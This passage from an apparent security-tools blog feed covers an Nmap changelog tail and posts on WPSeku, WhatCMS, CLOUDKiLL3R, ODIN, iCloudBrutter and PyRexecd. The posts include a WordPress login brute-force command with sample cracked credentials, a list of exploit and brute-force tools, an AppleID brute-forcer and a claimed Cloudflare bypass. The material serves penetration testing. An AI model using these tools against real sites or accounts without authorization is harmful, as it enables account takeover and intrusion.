compression. This work started during GSOC 2014, so we're particularly
pleased to finally integrate it! [Claudiu Perta, Daniel Miller]

• [NSE][GH#1004] Fixed handling of brute.retries variable. It was being
treated as the number of tries, not retries, and a value of 0 would result
in infinite retries. Instead, it is now the number of retries, defaulting
to 2 (3 total tries), with no option for infinite retries.

• [NSE] http-devframework-fingerprints.lua supports Jenkins server
detection and returns extra information when Jenkins is detected [Vinamra
Bhatia]

• [GH#926] The rarity level of MS SQL's service detection probe was
decreased. Now we can find MS SQL in odd ports without increasing version
intensity. [Paulino Calderon]

• [GH#957] Fix reporting of zlib and libssh2 versions in "nmap --version".
We were always reporting the version number of the included source, even
when a different version was actually linked. [Pavel Zhukov]

• Add a new helper function for nmap-service-probes match lines: $I(1,">")
will unpack an unsigned big-endian integer value up to 8 bytes wide from
capture 1. The second option can be "<" for little-endian. [Daniel Miller]

Download Nmap 7.70

↧

WPSeku v0.4 - Wordpress Security Scanner

March 21, 2018, 1:30 pm

≫ Next: WhatCMS - CMS Detection And Exploit Kit Based On Whatcms.org API

≪ Previous: Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more

WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Installation

$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py

Usage

Generic Scan

python3 wpseku.py --url https://www.xxxxxxx.com --verbose

Output

----------------------------------------
 _ _ _ ___ ___ ___| |_ _ _ 
| | | | . |_ -| -_| '_| | |
|_____|  _|___|___|_,_|___|
      |_|             v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Target: https://www.xxxxxxx.com
[ + ] Starting: 02:38:51

[ + ] Server: Apache
[ + ] Uncommon header "X-Pingback" found, with contents: https://www.xxxxxxx.com/xmlrpc.php
[ i ] Checking Full Path Disclosure...
[ + ] Full Path Disclosure: /home/ehc/public_html/wp-includes/rss-functions.php
[ i ] Checking wp-config backup file...
[ + ] wp-config.php available at: https://www.xxxxxxx.com/wp-config.php
[ i ] Checking common files...
[ + ] robots.txt file was found at: https://www.xxxxxxx.com/robots.txt
[ + ] xmlrpc.php file was found at: https://www.xxxxxxx.com/xmlrpc.php
[ + ] readme.html file was found at: https://www.xxxxxxx.com/readme.html
[ i ] Checking directory listing...
[ + ] Dir "/wp-admin/css" listing enable at: https://www.xxxxxxx.com/wp-admin/css/
[ + ] Dir "/wp-admin/images" listing enable at: https://www.xxxxxxx.com/wp-admin/images/
[ + ] Dir "/wp-admin/includes" listing enable at: https://www.xxxxxxx.com/wp-admin/includes/
[ + ] Dir "/wp-admin/js" listing enable at: https://www.xxxxxxx.com/wp-admin/js/
......

Bruteforce Login

python3 wpseku.py --url https://www.xxxxxxx.com --brute --user test --wordlist wl.txt --verbose

Output

----------------------------------------
 _ _ _ ___ ___ ___| |_ _ _ 
| | | | . |_ -| -_| '_| | |
|_____|  _|___|___|_,_|___|
      |_|             v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Target: https://www.xxxxxxx.com
[ + ] Starting: 02:46:32

[ + ] Bruteforcing Login via XML-RPC...
[ i ] Setting user: test
[ + ] Valid Credentials: 

-----------------------------
| Username | Passowrd       |
-----------------------------
| test     | kamperasqen13  |
-----------------------------

Scan plugin,theme and wordpress code

python3 wpseku.py --scan <dir/file> --verbose

Note: Testing Akismet Directory Plugin https://plugins.svn.wordpress.org/akismet

Output

----------------------------------------
 _ _ _ ___ ___ ___| |_ _ _ 
| | | | . |_ -| -_| '_| | |
|_____|  _|___|___|_,_|___|
      |_|             v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Checking PHP code...
[ + ] Scanning directory...
[ i ] Scanning trunk/class.akismet.php file
----------------------------------------------------------------------------------------------------------
| Line | Possibile Vuln.      | String                                                                   |
----------------------------------------------------------------------------------------------------------
|  597 | Cross-Site Scripting | [b"$_GET['action']", b"$_GET['action']"]                                 |
|  601 | Cross-Site Scripting | [b"$_GET['for']", b"$_GET['for']"]                                       |
|  140 | Cross-Site Scripting | [b"$_POST['akismet_comment_nonce']", b"$_POST['akismet_comment_nonce']"] |
|  144 | Cross-Site Scripting | [b"$_POST['_ajax_nonce-replyto-comment']"]                               |
|  586 | Cross-Site Scripting | [b"$_POST['status']", b"$_POST['status']"]                               |
|  588 | Cross-Site Scripting | [b"$_POST['spam']", b"$_POST['spam']"]                                   |
|  590 | Cross-Site Scripting | [b"$_POST['unspam']", b"$_POST['unspam']"]                               |
|  592 | Cross-Site Scripting | [b"$_POST['comment_status']", b"$_POST['comment_status']"]               |
|  599 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"]                               |
|  214 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"]               |
|  403 | Cross-Site Scripting | [b"$_SERVER['REQUEST_TIME_FLOAT']", b"$_SERVER['REQUEST_TIME_FLOAT']"]   |
|  861 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']", b"$_SERVER['REMOTE_ADDR']"]                 |
|  930 | Cross-Site Scripting | [b"$_SERVER['HTTP_USER_AGENT']", b"$_SERVER['HTTP_USER_AGENT']"]         |
|  934 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"]               |
| 1349 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']"]                                             |
----------------------------------------------------------------------------------------------------------
[ i ] Scanning trunk/wrapper.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/akismet.php file
-----------------------------------------------
| Line | Possibile Vuln.    | String          |
-----------------------------------------------
|   55 | Authorization Hole | [b'is_admin()'] |
-----------------------------------------------
[ i ] Scanning trunk/class.akismet-cli.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/class.akismet-widget.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/index.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/class.akismet-admin.php file
--------------------------------------------------------------------------------------------------------------------
| Line | Possibile Vuln.      | String                                                                             |
--------------------------------------------------------------------------------------------------------------------
|   39 | Cross-Site Scripting | [b"$_GET['page']", b"$_GET['page']"]                                               |
|  134 | Cross-Site Scripting | [b"$_GET['akismet_recheck']", b"$_GET['akismet_recheck']"]                         |
|  152 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"]                                               |
|  190 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"]                                               |
|  388 | Cross-Site Scripting | [b"$_GET['recheckqueue']"]                                                         |
|  841 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"]                                               |
|  843 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"]                                               |
|  850 | Cross-Site Scripting | [b"$_GET['action']"]                                                               |
|  851 | Cross-Site Scripting | [b"$_GET['action']"]                                                               |
|  852 | Cross-Site Scripting | [b"$_GET['_wpnonce']", b"$_GET['_wpnonce']"]                                       |
|  868 | Cross-Site Scripting | [b"$_GET['token']", b"$_GET['token']"]                                             |
|  869 | Cross-Site Scripting | [b"$_GET['token']"]                                                                |
|  873 | Cross-Site Scripting | [b"$_GET['action']"]                                                               |
|  874 | Cross-Site Scripting | [b"$_GET['action']"]                                                               |
| 1005 | Cross-Site Scripting | [b"$_GET['akismet_recheck_complete']"]                                             |
| 1006 | Cross-Site Scripting | [b"$_GET['recheck_count']"]                                                        |
| 1007 | Cross-Site Scripting | [b"$_GET['spam_count']"]                                                           |
|   31 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"]                                         |
|  256 | Cross-Site Scripting | [b"$_POST['_wpnonce']"]                                                            |
|  260 | Cross-Site Scripting | [b'$_POST[$option]', b'$_POST[$option]']                                           |
|  267 | Cross-Site Scripting | [b"$_POST['key']"]                                                                 |
|  392 | Cross-Site Scripting | [b"$_POST['offset']", b"$_POST['offset']", b"$_POST['limit']", b"$_POST['limit']"] |
|  447 | Cross-Site Scripting | [b"$_POST['id']"]                                                                  |
|  448 | Cross-Site Scripting | [b"$_POST['id']"]                                                                  |
|  460 | Cross-Site Scripting | [b"$_POST['id']", b"$_POST['url']"]                                                |
|  461 | Cross-Site Scripting | [b"$_POST['id']"]                                                                  |
|  464 | Cross-Site Scripting | [b"$_POST['url']"]                                                                 |
|  388 | Cross-Site Scripting | [b"$_REQUEST['action']", b"$_REQUEST['action']"]                                   |
|  400 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"]                         |
--------------------------------------------------------------------------------------------------------------------
[ i ] Scanning trunk/class.akismet-rest-api.php file
[ + ] Not found vulnerabilities

Credits and Contributors
Original idea and script from WPScan Team (https://wpscan.org/)
WPScan Vulnerability Database (https://wpvulndb.com/api)

Download WPSeku

↧

WhatCMS - CMS Detection And Exploit Kit Based On Whatcms.org API

March 22, 2018, 5:36 am

≫ Next: CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser

≪ Previous: WPSeku v0.4 - Wordpress Security Scanner

CMS Detection and Exploit Kit based on Whatcms.org API.

Introduction
Whatcms.sh can currently detect the use of more than 330 different CMS applications and services to later indicate a list of valid security audit tools for the detected CMS.
You need the whatcms.org API to use the tool:

Get API key

Use
Usage:./whatcms.sh example.com

-h          Display help message
-wh         Check hosting details
--tools     Display tools information

Information

Detected CMSs
CMS list

Included tools

TOOLS	UTILITY	REPO URL
Dumb0	Username Scrapper Tool	https://github.com/0verl0ad/Dumb0/
CMSsc4n	Identify Tool	https://github.com/n4xh4ck5/CMSsc4n
Puppet	Identify Tool	https://github.com/Poil/puppet-websites-facts
pyfiscan	Identify Tool	https://github.com/fgeek/pyfiscan
XAttacker	Exploit Tool	https://github.com/Moham3dRiahi/XAttacker
beecms	Exploit Tool	https://github.com/CHYbeta/cmsPoc
CMSXPL	Exploit Tool	https://github.com/tanprathan/CMS-XPL
JMassExploiter	Exploit Tool	https://github.com/anarcoder/JoomlaMassExploiter
WPMassExploiter	Exploit Tool	https://github.com/anarcoder/WordPressMassExploiter
CMSExpFram	Exploit Tool	https://github.com/Q2h1Cg/CMS-Exploit-Framework
LotusXploit	Exploit Tool	https://github.com/Hood3dRob1n/LotusCMS-Exploit
BadMod	Exploit Tool	https://github.com/MrSqar-Ye/BadMod
M0B	Exploit Tool	https://github.com/mobrine-mob/M0B-tool
LetMeFuckIt	Exploit Tool	https://github.com/onthefrontline/LetMeFuckIt-Scanner
magescan	Exploit Tool	https://github.com/steverobbins/magescan
PRESTA	Exploit Tool	https://github.com/AlisamTechnology/PRESTA-modules-shell-exploit
EktronE	Exploit Tool	https://github.com/tomkallo/Ektron_CMS_8.02_exploit
XBruteForcer	Brute Force Tool	https://github.com/Moham3dRiahi/XBruteForcer
CoMisSion	Analyze Tool	https://github.com/Intrinsec/comission
droopescan	Analyze Tool	https://github.com/droope/droopescan
CMSmap	Analyze Tool	https://github.com/Dionach/CMSmap
JoomScan	Analyze Tool	https://github.com/rezasp/joomscan
VBScan	Analyze Tool	https://github.com/rezasp/vbscan
JoomlaScan	Analyze Tool	https://github.com/drego85/JoomlaScan
c5scan	Analyze Tool	https://github.com/auraltension/c5scan
T3scan	Analyze Tool	https://github.com/Oblady/T3Scan
moodlescan	Analyze Tool	https://github.com/inc0d3/moodlescan
SPIPScan	Analyze Tool	https://github.com/PaulSec/SPIPScan
WPHunter	Analyze Tool	https://github.com/aryanrtm/WP-Hunter
WPSeku	Analyze Tool	https://github.com/m4ll0k/WPSeku
ACDrupal	Analyze Tool	https://github.com/mrmtwoj/ac-drupal
Plown	Analyze Tool	https://github.com/unweb/plown
conscan	Analyze Tool	https://github.com/nullsecuritynet/tools/tree/master/scanner/conscan
CMSScanner	Analyze Tool	https://github.com/CMS-Garden/cmsscanner
cmsExplorer	Analyze Tool	https://code.google.com/archive/p/cms-explorer
WPScan	Analyze Tool	https://github.com/wpscanteam/wpscan
MooScan	Analyze Tool	https://github.com/vortexau/mooscan
Scanners	Analyze Tool	https://github.com/b3o1/Scanners
LiferayScan	Analyze Tool	https://github.com/bcoles/LiferayScan
InfoLeak	Analyze Tool	https://github.com/SIWECOS/InfoLeak-Scanner
joomlavs	Analyze Tool	https://github.com/rastating/joomlavs
WAScan	Analyze Tool	https://github.com/m4ll0k/WAScan
RedHawk	Analyze Tool	https://github.com/Tuhinshubhra/RED_HAWK
HostileSBF	Analyze Tool	https://github.com/nahamsec/HostileSubBruteforcer

Download WhatCMS

↧

CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser

March 22, 2018, 1:39 pm

≫ Next: ODIN - Tool For Automating Penetration Testing Tasks

≪ Previous: WhatCMS - CMS Detection And Exploit Kit Based On Whatcms.org API

CLOUDKiLL3R bypasses Cloudflare protection service via TOR Browser !

CLOUDKiLL3R Requirements :

TOR Browser to scan as many sites as you want :)
Python Compiler

CLOUDKiLL3R Installation ?
Make sure that TOR Browser is up and running while working with CLOUDKiLL3R .
Make sure that the IP AND PORT are the same in TOR Browser preferences > advanced > Networks
Include the files below in one folder :

FILTER.txt
CK.pl

Make Sure The Modules Below Are Installed If NOT > use this command to install one : pip install [module name]

argparse
socks
socket
requests
sys

Contact :
Twitter.com/moh_security

Download CLOUDKiLL3R

↧

ODIN - Tool For Automating Penetration Testing Tasks

March 23, 2018, 6:39 am

≫ Next: iCloudBrutter - AppleID Bruteforce

≪ Previous: CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser

ODIN is made possible through the help, input, and work provided by others. Therefore, this project is entirely open source and available to all to use/modify. All this developer did was assemble the tools, convert some of them to Python 3, and stitch them together into an all-in-one toolkit.

What Can ODIN Do?

ODIN is still very much in development, but it aims to automate many of the common recon tasks carried out by penetration testers. Such as:

Harvesting email addresses and employee names for a company.
Linking employees and companies to social media profiles.
Checking to see if discovered accounts have been a part of any public security breaches or appeared in any pastes.
Collecting data on domains and IP addresses from Shodan, Censys, DNS records, and whois/RDAP.
Discovering subdomains, their related IP addresses, and looking for CDNs that might allow for domain fronting.
Hunting Office files and PDFs under a domain, downloading them, and extracting metadata.
Linking key words, like a company name or domain, to AWS via S3 buckets and account aliases.
More to come in the future...

Getting Started

Installing ODIN

ODIN requires Python 3. Using pipenv for managing the required libraries is the best option to avoid Python installations getting mixed-up.

Run pip3 install --user pipenv or python3 -m pip install --user pipenv.
Run git clone https://github.com/chrismaddalena/ODIN.git.
Run cd ODIN && pipenv install.
Run pipenv shell to get started using ODIN.

Note: On MacOS you may get an error about pew not being in your PATH after installing pipenv and attempting to install ODIN. To fix it, follow these steps in order:

Uninstall virtualenv, pipenv, and pew.
Install virtualenv
Install pew
Install pipenv

Setup API Keys

Review the keys.config.sample file to fill-in your API keys and create a keys.config file.
cd into the /setup directory and run setup_check.py to make sure your keys.config file is in order.
Install awscli and run aws configure.

The APIs and Services

ODIN uses several APIs to gather information. Some of these require an API key, but most of the APIs are free. That is to say, you can get a free key and then pay for more requests/day. Shodan is a good example of this. You may prefer to not use APIs at all for one reason or another. You can still use ODIN, but a few of the APIs are just really fantastic and you should consider using them, specifically Censys and Shodan.

Whois and RDAP

Both of these services are used to collect data on domains and IP addresses. This includes attaching domains to IP addresses, identifying the network CIDRs for these addresses, and pulling information about the owners.

No API key is needed.

Robtex

The Robtex free REST API is used to collect domain names tied to IP addresses. This information is displayed alongside the RDAP information for IP addresses, so you can see what else is hosted at that IP address.

No API key is needed.

Shodan

Shodan is used to search for domains and lookup hosts (IP addresses). This pulls in information like open ports, banners, hostnames, and location data. Shodan also flags hosts for well known vulnerabilities like Heartbleed. This data is recorded as well, if it exists, but does tend to be outdated (or just wrong) a lot of the time.

Sign-up for an account to get your API key: shodan.io

Censys

Censys is very much like Shodan, except less information about open ports/services is available. However, Censys provides a way to search for certificates tied to a domain. This can be a lot of data, but you may find new hosts, like those tied to an employee's email address and used for a VPS in the cloud.

Sign-up for an account to get your API key: censys.io

URLVoid

URLVoid offers reputation data for domains, including Alexa and Google rankings, domain age, and location data. It also keeps track of domains that have been flagged for malicious activity by various entities (e.g. Fortinet, Avira).

This may be the most "skippable" of the APIs, but some of the data can be useful and worthwhile. It's included for those occasions.

Sign-up for an account to get your API key: urlvoid.com/api

Twitter

If you setup a Twitter app for ODIN, the tokens can be used with Tweepy to collect account data (e.g. real name, location, follower count, and user description) from Twitter profiles ODIN has linked to the target organization.

In the future, this may be used to collect analytics from Twitter to help you find very active users or get a profile of them.

Become a Twitter developer by going to dev.twitter.com and then create an app on apps.twitter.com.

Cymon

eSentire's Cymon is used to check domains and IP addresses to see if the target appears in any of Cymon's collected threat intelligence feeds. This is used for reputation checks, but also used in combination with urlcrazy to check similar, registered domains to see if the domain or the domain's A-record IP addresses have been reported.

Note that appearing in a threat feed doesn't mean something is wrong or that Cymon has bad data. A domain may have been used for phishing, been detected and seized, and is now dormant with the old malicious A records. Then you have things like cloud service IPs that change hands often. Events like that can lead to a domain or IP being used for malicious activities one day and safe the next. Always investigate these findings before crying wolf to your client.

Sign-up for an account to get your API key: cymon.io

HaveIBeenPwned

Email addresses are checked against HIBP to determine if any email addresses for the organization have been mentioned in any pastes or been involved in any security breaches.

No API key is needed.

DNS Dumpster

DNS Dumpster is a cool project you can find at dnsdumpster.com. Subdomain information is collected from DNS Dumpster, including a neat domain map image!

No API key is needed.

NetCraft

ODIN will check NetCraft for domain history and known subdomains. This does require a web driver for Selenium. If you download a driver and provide the path to it in your keys.config file (Yes, this isn't really a key, but so be it), NetCraft searches will be kicked off automatically when you perform domain OSINT.

The Chrome web driver is recommended, but the Firefox/Gecko driver should work just fine, too.

Chrome Web Driver Gecko Driver

EmailHunter

Meant for marketing folks to find leads and contacts at a company, this service offers free API keys for harvesting their contact information organizaed by company/domain. Hunter will return names, email addresses, phone numbers, Twitter handles, LinkedIn profile links, and job titles.

Sign-up for an account to get your API key: hunter.io

Full Contact

Full Contact support is implemented only for their Company API at the moment, but support for the People API may come in the future. For now, this is used to build a company profile based on a target domain, such as the client's primary domain used for email and their website. Full Contact catalogues everything from website info and company logo(s) to website blurbs and social media profiles.

It's likely Full Contact will get some things wrong, such as number of employees. In my experience, the data is usually not too far off the mark, but the profile is only meant to act as a snapshot to get you started.

Sign-up for an account to get your API key: app.fullcontact.com

AWS

Yes, Amazon Web Services. ODIN will perform recon against AWS to find things like S3 buckets and accounts names and aliases. Account names are strings of numbers, so you will need some idea of what you're looking for there. Aliases, however, can be anything, like a company name, and those can be validated as existing or not.

By default, ODIN uses the client (-c) name and domain (-d) for searches. ODIN will search for the name with spaces stripped out, the domain with the TLD, and the domain without the TLD. Then ODIN will add some common suffices and prefixes, like "downloads-" or "-apps" to these keywords.

Optional wordlists can be provided for additional keywords and 'fixes. Keywords can be anything, really. Consider assembling a list of related words, alternate client names, etc.

An Amazon and awscli are required.

Digital Ocean

ODIN will search for Digital Ocean Spaces just like it searches for S3 buckets. Spaces follows the same standards as S3, so it is simple to verify existing Spaces.

No API key is needed.

FAQ

I get this syntax error. What's the deal?

Please make sure you are using Python 3, not Python 2.7 or earlier. I recommend using pipenv.

I get an error when ODIN tries to import a library. What's wrong?

Like above, please make sure you are using Python 3. ODIN must be run in Python 3 and the requirements must be installed using pip or pip3 for Python 3. To make sure all required libraries are installed for Python 3, use pipenv and the provided Pipfile. The Pipfile enforces Python 3, so you should be good to go.

See the installation instructions at the top.

Why do you not like "why not" questions?

If you ask "why not use X API" or "why not do Y like this," that's not very helpful. Presumably, the question is meant to convey the idea that X would be a good addition or Y is a bad way to accomplish a task and you want to know the reason it is not currently supported. The answer is most likely "I wasn't aware of this." That also means I don't know anything about it. :)

If you have a suggestion for a change, service, or API, please explain what it does and provide some details explaining why you think it would be a good addition.

Why not add support for the Clearbit API?

Clearbit looks useful for OSINT, but the free tier is restricted to 20 API calls in a month. That may even be 20 API calls for the life of the account. The details are unclear. Either way, that's very restrictive and I want ODIN to be as simple and free to use as possible. The paid tiers are quire expensive.

Why not use Wappalyzer?

Wappalyzer is useful, but it's very difficult to automate fetching the results from Wappalyzer. Some tools can do this, but they use an unmaintained package called wappalyzer-python (https://github.com/scrapinghub/wappalyzer-python). This package still works, as far as I know, but there are several problems with it. The package has not been updated in three years, the developers have stated they have no plans to change that or support wappalyzer-python, and the package is Python 2. It could be used until it breaks one day, but the Python 2 bit is the real sticking point.

Why not add support for the BuiltWith API?

Like Clearbit, BuiltWith is a neat resource and some interesting details can be reviewed on the website. The API, however, is not free. The free version of the API won't give you any details, so at best it can be used to highlight a domain you may want to then review on the BuiltWith website. Scraping the website search results is certainly possible, but that could easily break and/or be unreliable.

Adding support for BuiltWith hasn't been ruled out, but the goal is to make ODIN entirely free to use.

Why not use Full Contact's People API?

Currently only the Company API is used. There are plans to incorproate the People API in the future.

Does ODIN perform DNS brute forcing?

No, but it is being considered. However, brute forcing can take a long time and there are many tools that take care of this quite well. Those tools are not so easy to incorporate into ODIN without just running the commands for those tools. For subdomain discovery, it's hard to beat Aquatone right now and there's alwas Fierce and DNSRecon.

For now, ODIN leverages DNS Dumpster, DNSRail, and NetCraft to collect subdomains to get you started.

I don't have X API key, can I still use ODIN?

Absolutely. If an API key is missing from the keys.config file, any checks using those keys will be skipped. You are strongly encouraged to go get the free API keys to get the most out of ODIN, but you can skip any you don't want.

Special Thanks

A big thank you to a few contributors who gave me the OK to re-use some of their code:

Ninjasl0th - Creator of the original scope verification script and all around cool dude!
0xF1 - Architect behind Cymon and a great guy to have on your team!
GRC_Ninja - For providing great feedback regarding HTTP requests and RDAP.
Troy Hunt - For giving me permission to use HaveIBeenPwned's REST API in this way.

And to these folks who have created/maintained some of the tools integrated into ODIN:

Alton Johnson (altjx) - The creator of the original very cool PyFOCA that exists here in its new Python 3 form as a part of ODIN
Laramies - Creator of the awesome TheHarvester.
PaulSec - Creator of the unofficial API for the DNS Dumpster
Daniel Grzalek (Dagrz) - Creator of aws_pwn and the reason why I was able to build out AWS recon options.
TrullJ - For making the slick SSL Labs Scanner module.

Change Log

March 6, 2018

Added support for detecting oportunities for DNS cache snooping.
Added a new option to provide a wordlist of terms to be used as prefixes and suffixes for S3 bucket hunting.
Added Pipfile to replace requirements.txt and avoid conflicts with Python 2.x installs.
Finally updated the URLCrazy module for the SQLite3 database change.

January 3, 2018

Converted the old XLSX reports to a SQLite3 database solution!
Implemented multiprocessing (!) to greatly improve efficiency and shorten runtime!
Various other little bug fixes and tweaks.

Download ODIN

↧

iCloudBrutter - AppleID Bruteforce

March 23, 2018, 1:46 pm

≫ Next: PyRexecd - Standalone SSH Server For Windows

≪ Previous: ODIN - Tool For Automating Penetration Testing Tasks

iCloudBrutter is a simple python (3.x) script to perform basic bruteforce attack againts AppleID.

Usage of iCloudBrutter for attacking targets without prior mutual consent is illegal. iCloudBrutter developer not responsible to any damage caused by iCloudBrutter.

Installation

$ git clone https://github.com/m4ll0k/iCloudBrutter.git
$ cd iCloudBrutter
$ pip3 install requests,urllib3,socks
$ python3 icloud.py

Download iCloudBrutter

↧

PyRexecd - Standalone SSH Server For Windows

March 24, 2018, 6:30 am

≫ Next: LeakVM - Research & Pentesting Framework For Android, Run Security Tests Instantly

≪ Previous: iCloudBrutter - AppleID Bruteforce

PyRexecd is a standalone SSH server for Windows.

Features:

Standalone Win32 app (not a service) that resides in SysTray.
Supports a single user / pubkey auth only.
Notifies incoming connections via popup.
Sends/Receives the clipboard text via stdin/stdout.

Prerequisites:

Python 3 (or 2) - http://www.python.org/
Paramiko - http://www.paramiko.org/
PyWin32 - http://sourceforge.net/projects/pywin32/
cx_Freeze (optional) - https://pypi.python.org/pypi/cx_Freeze

How to Use:

> pip install pyrexecd
Run PyRexec.pyw.
It generates a new host key and opens a config directory (AppData\Roaming\PyRexecd).
Put your public key into the config dir.
> copy your\id_rsa.pub authorized_keys
Run PyRexec.pyw to start the server.
Log into the machine via 2200/tcp.
$ ssh -p 2200 windows

Command Line Syntax:

> pyrexecd.exe [-d] [-l logfile] [-s sshdir] [-L addr] [-p port]
               [-c cmdexe] [-u username] [-a authkeys] [-h homedir]
    ssh_host_key ...

-d : Turns on Debug mode (verbose logging).
-l logfile : Log file path (default: pyrexecd.log).
-s sshdir : Config directory path. (default: AppData\Roaming\PyRexecd)
-L a.b.c.d : Specifies the listen address (default: 127.0.0.1).
-p port : Specifies the listen port (default: 2200).
-c cmdexe : cmd.exe path. (default: cmd.exe)
-u username : Username.
-a authkeys : authorized_keys path. (default: authorized_keys)
-h homedir : Home directory path. (default: %UserProfile%)

Special commands:
Certain SSH command is recognized as special commands:

@clipget : Receives the clipboard text from Windows.
$ ssh windows @clipget > clipboard.txt
@clipset : Sends the clipboard text to Windows.
$ echo foo | ssh windows @clipset
@open, @edit, and @print : Windows shell operation. The target pathname should be given from stdin.
$ echo C:\User\euske\foo.txt | ssh windows @edit

How to Build .exe (requires cx_Freeze):

> pip install cx_Freeze
> python setup_exe.py build

Download pyrexecd

↧

Latest Images